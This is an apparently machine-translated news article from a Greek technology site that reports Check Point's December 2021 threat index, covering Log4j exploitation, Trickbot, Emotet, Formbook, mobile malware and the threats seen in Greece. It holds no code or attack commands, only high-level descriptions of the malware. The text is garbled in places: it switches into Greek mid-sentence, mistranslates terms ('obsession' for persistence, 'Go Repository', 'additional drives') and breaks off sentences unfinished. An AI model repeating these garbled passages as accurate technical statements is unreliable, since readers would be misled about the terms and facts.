December 2021: The most common malware

Check Point Research, its Threat Intelligence research department Check Point Software Technologies Ltd., of cyber security, has published its Global Threat Index for December 2021.

In a month we saw her Apache Log4j vulnerability to scan the dia, the researchers reported that Trickbot is still the most prevalent malware, albeit with a slightly lower 4% impact on organizations worldwide, down from 5% in November. Emotet also recently bounced back, quickly rising from seventh to second place. CPR also reveals that the most attacked industry continues to be Education/Research.

malware, malware, iguru

In December, the “Apache Log4j Remote Code Execution”  είναι η ευπάθεια με τη μεγαλύτερη συχνότητα εκμετάλλευσης, επηρεάζοντας το 48,3% των οργανισμών παγκοσμίως. Η ευπάθεια αναφέρθηκε για πρώτη φορά στις 9 Δεκεμβρίου στο πακέτο καταγραφής του Apache Log4j – την πιο δημοφιλή βιβλιοθήκη καταγραφής Java που χρησιμοποιείται σε πολλές υπηρεσίες και του Διαδικτύου με πάνω από 400.000 λήψεις από το GitHub Project. Η ευπάθεια προκάλεσε μια νέα μάστιγα, επηρεάζοντας τις μισές σχεδόν εταιρείες παγκοσμίως, σε πολύ σύντομο χρονικό διάστημα. Οι επιτιθέμενοι είναι σε θέση να εκμεταλλευτούν τις ευάλωτες εφαρμογές για να εκτελέσουν cryptojackers και άλλο κακόβουλο λογισμικό σε παραβιασμένους servers. Μέχρι τώρα, οι περισσότερες επιθέσεις επικεντρώνονταν στη χρήση άντλησης κρυπτονομισμάτων εις βάρος των θυμάτων, ωστόσο, οι πιο εξελιγμένοι δράστες άρχισαν να δρουν επιθετικά και να εκμεταλλεύονται την on high value targets.

"Log4j dominated the cybersecurity news in December. "This is one of the most serious vulnerabilities we have ever seen, and because of the complexity of repairing it and its ease of use, it is likely to remain with us for many years, unless companies take immediate steps to prevent attacks," he said. Maya Horowitz, Vice President of Research at Check Point Software.

"The same month we also saw the Emotet botnet move from seventh to second place as the most common malware. Just as we suspected, Emotet did not take long to lay a solid foundation since its reappearance last November. It is misleading and spreads quickly through phishing emails with malicious attachments or links. "It's now more important than ever for everyone to have a strong email security solution and to ensure that users know how to identify a suspicious message or attachment."

CPR reports that Education/Research is the most attacked industry worldwide in December, followed by Government/Military and ISP/MSP. The vulnerability “Apache Log4j ” είναι η πιο συχνά εκμεταλλευόμενη, επηρεάζοντας το 48,3% των οργανισμών παγκοσμίως, ακολουθούμενη από την “Web Server Exposed Git Repository Information Disclosure” που επηρεάζει το 43,8% των οργανισμών παγκοσμίως. Η “HTTP Remote Code Execution” remains in third place on the list of most frequently exploited vulnerabilities, with a global impact of 41,5%.

TOP groups

* The arrows refer to the change of the ranking in relation to the previous month.

This month, the Trickbot is the most widespread malware affecting 4% of organizations worldwide, followed by Emotet and Formbook, both with a global impact of 3%.

  1. Trickbot - Trickbot is a modular Botnet and Banking Trojan that is constantly updated with new features, characteristics and distribution channels. This allows Trickbot to be a flexible and customizable malware that can be distributed as part of multipurpose campaigns.
  2. Emotet Emotet is an advanced, self-replicating and modular Trojan. Emotet was once used as a banking Trojan, but has recently been used as a distributor for other malware or malware campaigns. Uses multiple methods to maintain obsession and avoidance techniques to avoid detection. Additionally, it can spread through spam phishing messages that contain malicious attachments or links.
  3. Formbook - Formbook is an InfoStealer that collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files according to C&C commands.

Leading attacks in industries worldwide:

This month, Education / Research is the industry with the most attacks worldwide, followed by the Government / Armed Forces and the ISP / MSP.

  1. Education / Research
  2. Government / Armed Forces
  3. ISP / MSP

The top exploiting vulnerabilities

In December, "Apache Log4j Remote Code Execution" is the most commonly exploited vulnerability, affecting 48,3% of organizations worldwide, followed by "Git Repository Web Server Exposed" which affects 43,8% of organizations worldwide. HTTP Headers Remote Code Execution remains third on the list of most frequently exploited vulnerabilities, with a global impact of 41,5%.

  1. Remote code execution Apache log4j (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected .
  2. Development Server & Hosting Exposed Go Repository Information Disclosure- A vulnerability was reported in the Git Repository. Successfully exploiting this vulnerability could allow unintentional disclosure of account information.
  3. HTTP Headers Remote -- Execution (CVE-2020-10826,CVE-2020-10827,CVE-2020-10828,CVE-2020-13756) HTTP headers allow the user and the server to forward additional information with an HTTP request. A remote intruder can use a vulnerable HTTP header to execute arbitrary code on the victim's machine.

Top Malicious Mobile Apps

AlienBot ranks first among the most prevalent malware on mobile, followed by xHelper and FluBot.

  1. AlienBot -The AlienBot malware family is one Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker to, as a first step, inject malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of the their.
  2. xHelper - A malicious application that has been in the forefront since March 2019 and is used to download other malicious applications and display ads. The application is capable of being hidden from the user and can even be reinstalled if it has been uninstalled.
  3. flubot - FluBot is an Android botnet that distributes via SMS phishing, most often pretending to be delivery companies. As soon as the user clicks on the link in the message, FluBot is installed and accesses all the sensitive information on the phone.

The most common malware threats in Greece for December 2021 are:

Formbook FormBook was first identified in 2016 and is an InfoStealer targeting the Windows operating system. It is marketed as MaaS in underground hacking forums for its powerful avoidance techniques and relatively low price. FormBook collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files as instructed by its C&C.

Emotet- The Emotet is an advanced, self-replicating and modular Trojan that was once used as a banking Trojan and now distributes other malicious programs or malicious campaigns. Emotet uses multiple methods to maintain its obsession and avoidance techniques to prevent detection and can be spread through spam emails that contain malicious attachments or links.

agent TeslaAgentTesla is an advanced RAT (Trojan Remote Access) that acts as a keylogger and password thief. Active since 2014, AgentTesla can track and collect victim input's keyboard and clipboard, and capture screenshots and extract credentials for a variety of software installed on the victim's machine (including Chrome, Mozilla Firefox and Microsoft Outlook email client). AgentTesla sells openly as a legal RAT with customers paying $ 15- $ 69 for licenses.

Trickbot- The Trickbot is a modular Botnet and Banking Trojan that targets the Windows platform, which is distributed mainly through spam campaigns or other malware families such as Emotet. Trickbot sends information about the infected system and can also download and execute arbitrary modules from a wide range of available modules: from a VNC module for remote control to an SMB module for distribution within a compromised network.

Once a machine is infected, the Trickbot gang, the menacing agents behind this malware, use this wide range of modules not only to steal bank credentials from the target computer, but also to move around and identify itself. target organization, before launching a targeted ransomware attack across the company.

Joker– An android on Google Play, designed to steal SMS messages, contact lists and device information. Additionally, the malware signs the victim silently for services on advertising sites.

DridexDridex is a banking platform targeted at the Windows platform, which is distributed through spam campaigns and Exploit Kits, which relies on WebInjects to spy on and redirect bank credentials to a server controlled by an attacker. Dridex communicates with a remote server, sends information about the infected system, and can also download and run additional drives for remote control.

Vidar- Vidar is an infolstealer that targets Windows operating systems. It was first detected in late 2018 and is designed to steal passwords, credit card data and other sensitive information from various internet browsers and digital wallets. Vidar has been sold on various online forums and is used as a malware dropper that downloads ransomware GandCrab as a secondary payload.

CryptobotCryptbot is a Trojan that infects systems by installing a rogue VPN program and stealing stored browser credentials.

TeabotTeabot malware is an Android Trojan threat used in phishing attacks. Once Teabot is installed on the compromised device, it can stream the screen live to the perpetrator, as well as use the Accessibility Services to perform other malicious activities.

Triada- Triada is a modular backdoor for Android, which provides super-user privileges for downloading malware. Triada has also been observed to tamper with URLs loaded in the browser.

XMRigXMRig, first introduced in May 2017, is an open source CPU mining software used to extract Monero cryptocurrency.

2022 01 12 15 03 40

The Global Threat Impact List and Check Point Software's ThreatCloud Map are based on the Company's ThreatCloud intelligence, the largest cybercrime collaboration network, which provides data on threats and trends in attacks, utilizing a global network threat detectors.

The ThreatCloud database includes over 3 billion websites and 600 million files daily and detects more than 250 million malware activities each day.

The full list of the top 10 malware families in December can be found at blog of Check Point

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.
malware, malware, iguru

Written by newsbot

Although the press releases will be from very select to rarely, I said to go ... because sometimes the authors are hiding.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).